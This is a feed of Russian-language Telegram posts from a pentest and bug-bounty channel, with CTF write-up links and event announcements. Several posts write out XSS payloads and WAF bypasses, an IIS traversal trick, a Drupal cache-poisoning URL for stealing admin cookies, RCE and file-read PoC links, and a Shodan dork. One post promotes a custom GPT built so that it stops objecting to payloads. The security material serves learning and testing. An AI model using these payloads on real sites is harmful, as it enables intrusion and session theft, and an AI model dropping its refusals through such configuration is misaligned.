#podcast #НеДляГалочки
Утечки или ночной кошмар DPO. Откуда берутся, в чем причины. Разбираем кейсы с этичным хакером😄
ОСТОРОЖНО! В этом выпуске много практических кейсов, конкретных рекомендаций и историй из жизни хакера.
💡Apple, Яндекс
🎤Ведущие выпуска:
🔵Кристина Боровикова, со-основатель RPPA, Kept Privacy Team Lead
🔵Елизавета Дмитриева, data privacy engineer в российском инхаусе
🆕Помогали справиться с кошмаром:
🔵Александр Герасимов — этичный хакер, эксперт в области тестирования на проникновение и анализа защищенности. Директор по информационной безопасности и сооснователь Awillix.
🔵Елизавета Никулина — директор по маркетингу и PR в Awillix
Обсудили:
⬇️Векторы атак
⬇️Жизненный цикл утечек данных
⬇️Последствия утечек для человека
⬇️Реагирование на инциденты, а том числе PR-позиция компании
⬇️Немного коснулись базовой инфобезной терминологии
👾Райтап для задачи "Xss 3", которая не была решена в JIS CTF 2023 и CAT CTF 23
Классный таск, сценарий которого максимально приближен к реальной жизни, когда кажется, что все символы экранированы и выполнить XSS нельзя.
Вы узнаете как в php можно обойти htmlspecialchars(), а также побороть ограничение на количество символов.
Читать статью
#web #xss #bypass #ctf
🔃 Недавние уязвимости рендера в PDF
Если видим места, где рендерится PDF и у нас есть возможность влиять на его элементы обращаем внимание на уязвимости в:
ReportLab:
https://github.com/c53elyas/CVE-2023-33733
Dompdf:
https://github.com/advisories?query=CVE-2023-23924
На скрине ниже пример эксплуатации уязвимости в ReportLab приводящий к RCE.
#web #cve
Результаты розыгрыша:
Победители:
1. IlluminatI
2. T@Kov
3. verner
4. Roman
5. Maksim
6. Зᴇбᴩᴀ
7. Денис
8. Давид Кройсманн
9. Artem
10. yanikita
Проверить результаты
🛡️ Пентестерские Будни #1: Уязвимости Криптобирж и Зачем Выбирать Место Хранения Крипты С Особой Осторожностью https://telegra.ph/Pentesterskie-Budni-1-Samye-rasprastranennye-uyazvimosti-kriptobirzh-i-pochemu-nelzya-ostavlyat-svoyu-kriptu-na-maloizvestnyh-bi-10-13
Читать полностью…📄Microsoft Office XSS
Смотрел статьи про уязвимости в вебе, а нашел про xss'ку у мелкомягких.
По ссылке ниже рассказали, как через пэйлоад в заголовке можно выполнить JS код при воспроизведении видео в Microsoft Office.
Ссылка на статью
#redteam #office #xss
Исследование уязвимостей IDOR и Broken Access Control: автоматизация их поиска с помощью расширения Autorize в Burp Suite и кейс из мира Bug Bounty📅
https://telegra.ph/IDOR-Autorize-BrokenAccessControl-09-27
А вот и записи и слайды докладов с VolgaCTF 2023 подъехали :)
https://www.youtube.com/playlist?list=PLn9UM_ZLJ6PBx5fsRS5AKZDjJZ7znC5yp
http://archive.volgactf.ru/#volgactf_2023/slides/
Батя вэба @BlackFan вещает про csrf, crlf, open redirect и http parameter pollution.
Просто офигеть как круто и понятно объясняет доклад, идею для атак, показывает упорство при определенных ограничениях. Огромное спасибо за такое!
https://youtu.be/p1ClNhaoZQ8
🏳️🌈 Stored XSS в Google Books
В прикрепленном видео вы узнаете как была найдена хранимая XSS в Google Books, а cavdarbashas/how-i-found-an-stored-xss-on-google-books-732d9eb64e36">по данной ссылке можете ознакомиться с полным рассказом от исследователя.
P.S. шутки про XSS на главной гугла, перестают быть таким уж и шутками…
cavdarbashas/how-i-found-an-stored-xss-on-google-books-732d9eb64e36">Ссылка на статью
Ссылка на видео
#web #xss
🦊 Про кастомные элементы в DOM
Иногда бывает полезно посмотреть customElements.define()
в библиотеках и внутреннем JS-коде. Эта функция регистрирует новые элементы DOM, и WAF свободно пропускает их.
На скрине внизу показан стандартный JS для PyScript, в котором создается элемент <py-script>
, что приводит к интересному байпасу:<py-script>'\74img/src/onerror\75alert(domain)\76'</py-script>
Попробовать самостоятельно можно тут.
#web #xss
💻Что поискать на сайте с IIS?
1. Используем shortscan, для поиска коротких (а по возможности и полных) имен файлов и расширений.
2. Проверяем наличие реверс прокси и пробуем directory traversal:/backend/ -> 10.0.0.1/api/
/backend/..%2Ftest -> 10.0.0.1/test
Подробнее можно почитать тут.
3. Когда удастся получить раскрытие файлов, смотрим ключи в web.conf
и пробуем получить RCE через дисериализацию. Почитать об этом тут.
4. Пробуем грузить файлы .asp
, .aspx
, .ashx
и тд (полный список тут)
#web #iis #rce
👨💻Ошибки в регулярных выражениях
Взгляните на изображение снизу. Это регулярка для сабдоменов. Символ "-
" при использовании внутри класса символов, используется для определения диапазона символов. Следовательно, ".-_
" в этом регулярном выражении будет соответствовать всем символам ASCII между ".
" и "_
". А значит пэйлоад вроде <script/src=//14.rs>
также будет валидным.
Эта ошибка встречается довольно часто и может привести ко многим серьезным проблемам. Поэтому, разработчикам следует ставить "-
" в конце, а специалистам по безопасности обращать внимание на подобные ошибки.
#web #xss
📄 Вордлисты для фаззинга от ChatGPT
@reewardius потратил время и собрал интересный вордлист с помощью OpenAI ChatGPT, словаря от Bo0om (fuzz.txt) и других багхантеров.
Выглядит интересно и свежо, так как содержит ряд уникальных, но потенциально интересных эндпоинтов. Проект жив и обещает активно дополняться и подчищаться.
Ссылка на GitHub
#web #fuzz
tufavolo/%D0%BF%D1%80%D0%B8%D0%B2%D0%B0%D1%82%D0%BD%D1%8B%D0%B9-%D0%BB%D0%B8%D0%BD%D1%83%D0%BA%D1%81-%D0%B2-%D0%BD%D0%BE%D1%80%D0%B5-2d01b9ba69b8">Я наконец то дописала большую статью про безопасность линукс на русском.
Материал для моих англоязычных читателей выйдет чуть позжеI finally wrote a long article about Linux security.
Material for my English-speaking readers will be released a little later
Приятного прочтения❤️Недавно OpenAI представила для подписчиков Plus контекстное окно в 32к токенов! А еще возможность создания кастомных GPT на основе своих данных.
Мне пришла идея создать свою сборку — загрузить чеклисты и методологии файлами в конфигуратор.
Представляю вашему вниманию Кавычка GPT
Теперь модель больше не будет спорить с вами об этичности пэйлоадов.
https://chat.openai.com/g/g-5KWmQ9wKU-kavychka-gpt
💻 Раскрытые уязвимости с багбаунти, ч.6
1️⃣ Манипуляция ценой при покупке годовой лицензии
2️⃣ Лишаем пользователей возможности зарегистрироваться на сайте через логическую ошибка при добавлении нескольких почт
3️⃣ Простой Reflected XSS с обходом WAF
#web #xss #logic #bypass
У канала Похек (ex Дневник Безопасника) сегодня день рождения, в связи с чем рекомендую вам заценить контент у них на канале и поддержать подпиской (там много всего интересного).
P.S. не реклама, сам давно подписан
🎉Розыгрыш для подписчиков
Оказывается, что завтра, 15 октября, каналу исполняется уже 3 года!!
И чтобы отпраздновать вместе с вами я решил скинуться вам на пиво и провести небольшую раздачу крипты среди самых активных зрителей канала.
Десять рандомных подписчиков получит по 10 TON. Конкурс продлится чуть больше суток.
Кроме подписки, условий никаких нет, так что кидайте реакцию на пост и жмите кнопку «Участвую!». Бот выберет победителей 15 октября в 18:00.
📝Немного про шаблоны для BCheck
Решил на днях собрать свою коллекцию шаблонов для BCheck. Если вдруг еще не познакомились с этим функционалом в Burp Suite, то вот неплохая статья, чтобы быстро вкатиться.
И дыбы не выдумывать велосипед, решил посмотреть уже готовые шаблоны в открытом доступе и, к моему счастью, нашелся репозиторий, в котором уже собрана целая подборка.
Бегло прошерстив ее, выделил для себя примерный план того, что нужно написать самостоятельно, а что можно позаимствовать или внести небольшие коррективы.
Например шаблон, для Blind SSRF смотрит только параметры url
и proxy
. Мы же в свою очередь можем добавить и другие популярные параметры и повысить свои шансы на успех. Или, например, добавить больше проверок в шаблон для crlf. В общем, проявите фантазию и однажды это принесет свои плоды.
Ссылка на GitHub
#web #tools #burp
☠️Отравление кеша в ядре Drupal
Согласно раскрытому описанию CVE-2023-5256 вы можете кэшировать сессионные куки администратора, вызывая ответ 4xx при посещении созданного URL-адреса в JSON:API.
Можно заманить админа по ссылке, украсть его сессионные куки и получить доступ с правами администратора к веб-сайту. Таким образом злоумышленник может полностью нарушить конфиденциальность, целостность и доступность веб-сайта.
PoC/jsonapi/user/user?filter[a-labex][condition][path]=cachingyourcookie
#web #cve #cache
🍁 Эксплуатация XSS в параметре функции
Представим ситуацию, когда вы заглядываете в JS и ваш ввод попадает в конструкцию:func("x","ваш ввод")
При этом, запрещено использование символов <>'()`
однако разрешено использование "
Первое, что мы должны помнить, это то, что любая функция в JS может принимать неограниченное количество параметров. Таким образом можно использовать конструкцию:func("x","",location="javascript:alert(1)")
Затем, вспоминаем, что использование скобок запрещено, но, в данном контексте, это не проблема. Мы можем просто закодировать их в hex и выполнить XSS:func("x","",location="javascript:alert\x281\x29")
Но есть еще один трюк, который может быть вам полезен. Если открывать уязвимый сайт через другой сайт, то можно принудительно задать значение window.name
, через window.open()
, что позволит нам сократить пэйлоад и выполнить XSS несколько иным образом:func("x"+{a.location=name}+"")
func("x"+new class b{toString=e=>location=name}+"")
Более подробно и наглядно обо всем этом можете посмотреть тут.
#web #xss
🍁 Хорошая осенняя традиция — учиться новому!
Cовместно с центром экспертизы по кибербезопасности CyberEd мы запускаем конкурс на новых сегментах киберполигона Standoff 365.
С 21 сентября по 10 ноября за успешную реализацию атак в IT-компании NetFusionPro и еще одном сегменте, который запустим совсем скоро, выберем четырех победителей, которые наберут:
1. Наибольшее количество баллов среди школьников: суммарно на NetFusionPro и новом сегменте.
2. Наибольшее количество баллов среди студентов: суммарно на NetFusionPro и новом сегменте.
3. Наибольшее количество баллов среди всех участников на новом сегменте с активной командой защитников NetFusionPro.
4. Максимум баллов за реализацию рисков на новом сегменте среди всех участников.
💡Только в первой и во второй номинациях баллы будут суммированы по двум сегментам сразу.
Всем победителям подарим сертификат на любой курс профессиональной подготовки от CyberEd и персональное приглашение на Standoff Talks в конце ноября. Официальное награждение пройдет 25 ноября на сцене Standoff Talks в Москве.
Чтобы принять участие в первой или второй номинации, укажите ваш ник и контакты до 1 ноября 👉 вот тут.
Удачи! ☘️
Привет. Спишь?)
А мы тут записи докладов и презентации к ним выложили:
— Track 1,
— Track 2,
— Community Track,
— AppSec.Zone,
— AntiFraud.Zone,
— CTF.Zone.
Сохраняйте себе и делитесь с друзьями! ®️
Интересный доклад от @i_bo0om про атаки на битрикс. Оставлю тут, чтобы не потерять.
#web #bitrix
⌨️Закрытый митап для пентестеров и аппсекеров
28 сентября 2023 в одном из баров Москвы состоится оффлайн-митап по offensive security.
От комьюнити для комьюнити. Никакого пиара и продуктов. Начало митапа – в 17:00.
Некоторые темы: архитектура сети и атаки на Control Plane, подход к пентесту Wi-Fi сетей, атаки на WPA2-Enterprise и 802.1x.
Все это будет проходить в отличной атмосфере за кружкой пива и закусками.
Также обсудим пентест со всевозможных сторон: зачем он нужен компаниям, как они его проводят и что хотят от него получить, а также что для этого нужно знать самим пентестерам.
Зарегистрироваться можно через чат бот - @PentestMeetupBot
Успей забронировать своё место, так как их количество ограничено.
Всю подробную информацию можно найти в боте. Ждем тебя на встрече!
#митап
🗳Чтение произвольного файла через ImageMagick
Обнаружены уязвимости в ImageMagick, которые приводят к Dos (CVE-2022-44267
) или удалённому чтению произвольного файла (CVE-2022-44268
).
Пример эксплуатации последней представлен на видео снизу. Ссылка на инструмент для создания вредоносных картинок также прилагается. Полный обзор уязвимостей смотрите по ссылке.
Ссылка на PoC
#web #lfr #cve
💳 Вспоминаем про уязвимости банковских приложений
Современные банковские приложения у меня всегда вызывали интерес из-за широкого функционала и наличие большого количества чувствительных данных. И тут я вижу, что на Bi.ZONE появился Тинькофф, причем с широким скоупом.
Доступны все основные сервисы экосистемы и мобильные приложения. Вознаграждение до 150 000 рублей, а если задонатить на благотворительность, то компания увеличит сумму в 5 раз.
А значит, самое время пошерстить новый функционал, который еще не был обкатан большинством багхантеров. Не лишним будет и вспомнить про уязвимости платежных систем, о которых было рассказано на канале тут и тут.
Ссылка на программу
#web
📝Раскрытие исходного кода в PHP Development Server <= 7.4.21
Уязвимость позволяет узнать исходный код PHP файлов на сервере. Технический анализ и подробности читайте тут.
Поискать уязвимые хосты можно в Shodan, например, с помощью дорка:PHP/7.4.21
Ссылка на статью
Ссылка на шаблон для Nuclei
#web #leak #dork
🐥 Создаем свой загрузочный диск Linux
Если вы, как и я когда-то, решите создать свой загрузочный образ Linux, чтобы накатить его на флешку и иметь готовую к работе систему всегда под рукой, то крайне рекомендую посмотреть эту статью.
В статье довольно подробно и по делу описывается весь процесс, что позволит вам лучше разобраться в теме и создать свой кастомный образ с необходимым вам набором программ и без лишнего хлама.
Ссылка на статью
#linux